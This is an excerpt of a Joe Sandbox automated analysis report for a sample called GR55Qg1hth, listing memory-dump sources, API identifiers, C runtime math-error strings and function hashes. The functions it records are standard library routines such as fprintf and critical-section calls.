                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-3474627141
                                                                    • Opcode ID: 37c52b41da379d42167ac2f86afbd84dbf64a89c612c71dc3cef279e83f05fd2
                                                                    • Instruction ID: 339c55579e0868f1ac2cfb47acfb2ddafe4b68c65fea5bdaaeab38d76efa58c3
                                                                    • Opcode Fuzzy Hash: 37c52b41da379d42167ac2f86afbd84dbf64a89c612c71dc3cef279e83f05fd2
                                                                    • Instruction Fuzzy Hash: BC018E22908E8AE6D7128F1CD8011FA7374FF9979AF285321EA8C66320DF29E543C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-4064033741
                                                                    • Opcode ID: ec45c17de2dbf1fc296be5272a5fe98e5eec1b6ea0fd886e648861f84c17b2e8
                                                                    • Instruction ID: 968508d33268100ac0890122ba44140388dd1fb7b9bf6a9e96e276f9e69947fe
                                                                    • Opcode Fuzzy Hash: ec45c17de2dbf1fc296be5272a5fe98e5eec1b6ea0fd886e648861f84c17b2e8
                                                                    • Instruction Fuzzy Hash: 43F04F22908E8592D212CF19A4011AA7364FF4D799F585326EA8D76665DF28E5438700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-4283191376
                                                                    • Opcode ID: 14c51567a3860b6bc97f98f006ee49fb41c3379164caa194474656353d69950b
                                                                    • Instruction ID: 41df258ec9fffa48b6752a328ea2995d5c33b735198bdfa23bf4ec9c611cfd66
                                                                    • Opcode Fuzzy Hash: 14c51567a3860b6bc97f98f006ee49fb41c3379164caa194474656353d69950b
                                                                    • Instruction Fuzzy Hash: BFF04F22918E8592D212CF19A4001AA7364FF4D799F585326EA8D76665DF28E5438700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-2713391170
                                                                    • Opcode ID: 5c85093b147d1019dd0a804187a52c1ec3df5f9400b934be2122cf81485debb3
                                                                    • Instruction ID: 0a9530d64dd511ad6cc93786381ddc868bf5a02aa9ca56a70d6a2000f3beb984
                                                                    • Opcode Fuzzy Hash: 5c85093b147d1019dd0a804187a52c1ec3df5f9400b934be2122cf81485debb3
                                                                    • Instruction Fuzzy Hash: 0EF04F22908E8692D212CF19A4001AA7364FF4D799F585326EA8D76665DF28E5438700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-4273532761
                                                                    • Opcode ID: 505fb02ea3ddbe0586ed915dce5c9b3036b4362b7f233f424ddae35eedb8b362
                                                                    • Instruction ID: e79e8cc4fc2a4fd0928da50a6c1952aa19735ea9d8de9b468025288114ef58bd
                                                                    • Opcode Fuzzy Hash: 505fb02ea3ddbe0586ed915dce5c9b3036b4362b7f233f424ddae35eedb8b362
                                                                    • Instruction Fuzzy Hash: 29F04F22908E8692D2128F19A4011AA7364FF4D799F595326EA8D76625DF28E5438700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-2187435201
                                                                    • Opcode ID: 161c91b47cf0f2cbc665028cd511bf77279a09f276d4fdfe26771d9a20d11c53
                                                                    • Instruction ID: 0d3503193d4fc4e3655edbaccadb28963d6456e573a30ee8c387623be321df7b
                                                                    • Opcode Fuzzy Hash: 161c91b47cf0f2cbc665028cd511bf77279a09f276d4fdfe26771d9a20d11c53
                                                                    • Instruction Fuzzy Hash: A2F04F26908E8592D212CF19A4001AA7364FF4D799F585326EA8D76265DF28E5438700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-2468659920
                                                                    • Opcode ID: fcd2f609e7f223da69f165f25b87fb25282118e9ae36898b0305bd1bd3ade028
                                                                    • Instruction ID: ca945b37119a11721cba67a73fcbae62255e1481e86ebf96abe312d47fcbe012
                                                                    • Opcode Fuzzy Hash: fcd2f609e7f223da69f165f25b87fb25282118e9ae36898b0305bd1bd3ade028
                                                                    • Instruction Fuzzy Hash: 95F09622908E8592D302CF1CA4001AB7374FF4D799F185326EF8C76225DF28D5438700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                                    • API String ID: 592178966-758928094
                                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction ID: 1cf5e14392f2a44a2fc60c929d4c85e0311c6b45d6dce6455f309635c247e02f
                                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction Fuzzy Hash: 65E04F61640B48D1EB018F21E8406E873A0AB6CF64B589122DE5C46361EB7CD1EDC301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: Locator'$riptor at (
                                                                    • API String ID: 592178966-4215709766
                                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction ID: a12eb2fd36644d3968e39a20d36077860ddc3d5b3b6908a845ff1751ff11109c
                                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction Fuzzy Hash: 70E08671640B48C0EF018F21D4406E873E0F76CF54B889122CE4C46321EB3CD1E9C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 959defe685b640915e4595d737b319956bc1311b245fa585c7dce49d1b130bdf
                                                                    • Instruction ID: abfd6aeaef424ab54a7cdd533b718ce3ed3bc5deea9070b19a431c8d3c46583b
                                                                    • Opcode Fuzzy Hash: 959defe685b640915e4595d737b319956bc1311b245fa585c7dce49d1b130bdf
                                                                    • Instruction Fuzzy Hash: 3E315072A18642ABE794CF3194406BA2790FB49B6CF5C4136DE299A3D4DF3CD885CB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$ReleaseSemaphore
                                                                    • String ID:
                                                                    • API String ID: 3630377130-0
                                                                    • Opcode ID: a67a09f4d187a599d055ff11ed998ab8fcdd49affbb6f0129b7d1f2afb771be5
                                                                    • Instruction ID: 14ca3ed4c633e9e567b852820b1a4edcdb2bac1c8ca9a0a609df703e3233d8c2
                                                                    • Opcode Fuzzy Hash: a67a09f4d187a599d055ff11ed998ab8fcdd49affbb6f0129b7d1f2afb771be5
                                                                    • Instruction Fuzzy Hash: 65317872A04A03ABE7508F36D9012AA37A4FB89BA8F484131DE1DD7385DF38E485CB10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 2e7b2cbae20418b4c0d453f8b4b50e77aefd59ea86c03595ff55a991a6a710d5
                                                                    • Instruction ID: 874e65cf1b48dac332c680eae8b9458a47d6a0ab99cbedb04b6bd6ea64194bd9
                                                                    • Opcode Fuzzy Hash: 2e7b2cbae20418b4c0d453f8b4b50e77aefd59ea86c03595ff55a991a6a710d5
                                                                    • Instruction Fuzzy Hash: 39318473A08603ABDB84CF35D5402A937A4FB49B68F5C8635DD199A788DF38D485CB50
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00007FF650239509), ref: 00007FF650238F06
                                                                    • LeaveCriticalSection.KERNEL32(?,00007FF650239509,?,?,?,?,?,?,?,?,?,?,?,00007FF65047F400,?), ref: 00007FF650238F2B
                                                                    • EnterCriticalSection.KERNEL32(?,00007FF650239509,?,?,?,?,?,?,?,?,?,?,?,00007FF65047F400,?), ref: 00007FF650238F5C
                                                                    • LeaveCriticalSection.KERNEL32(?,00007FF650239509,?,?,?,?,?,?,?,?,?,?,?,00007FF65047F400,?), ref: 00007FF650238F66
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 443565f992c4bd1cd09b56ac24280876d411eae57f5959cf7ad58327f286b010
                                                                    • Instruction ID: 9e627cfea4a34ead991e583a49852c715b1e2c7d23bbd29cc35a7826bd53cc9c
                                                                    • Opcode Fuzzy Hash: 443565f992c4bd1cd09b56ac24280876d411eae57f5959cf7ad58327f286b010
                                                                    • Instruction Fuzzy Hash: 9501F222B19746A9E615EB23BD40A7B6A50BF88FEDF891031ED0D5BB50CD3CE4868340